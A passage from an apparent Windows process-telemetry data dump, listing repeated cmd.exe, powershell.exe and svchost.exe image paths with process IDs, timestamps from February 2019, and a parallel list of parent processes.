12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xeb02019-02-10 12:45:36.280000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x212c2019-02-10 12:45:35.713000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x107c2019-02-10 12:48:15.140000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1ef42019-02-10 12:48:15.937000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1a5c2019-02-10 12:44:47.237000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\usoclient.exe0xc5c2019-02-10 13:55:20.800000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xb3c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xd442019-02-10 15:48:03.363000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\"],\"parent_proc_lc\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\usoclient.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\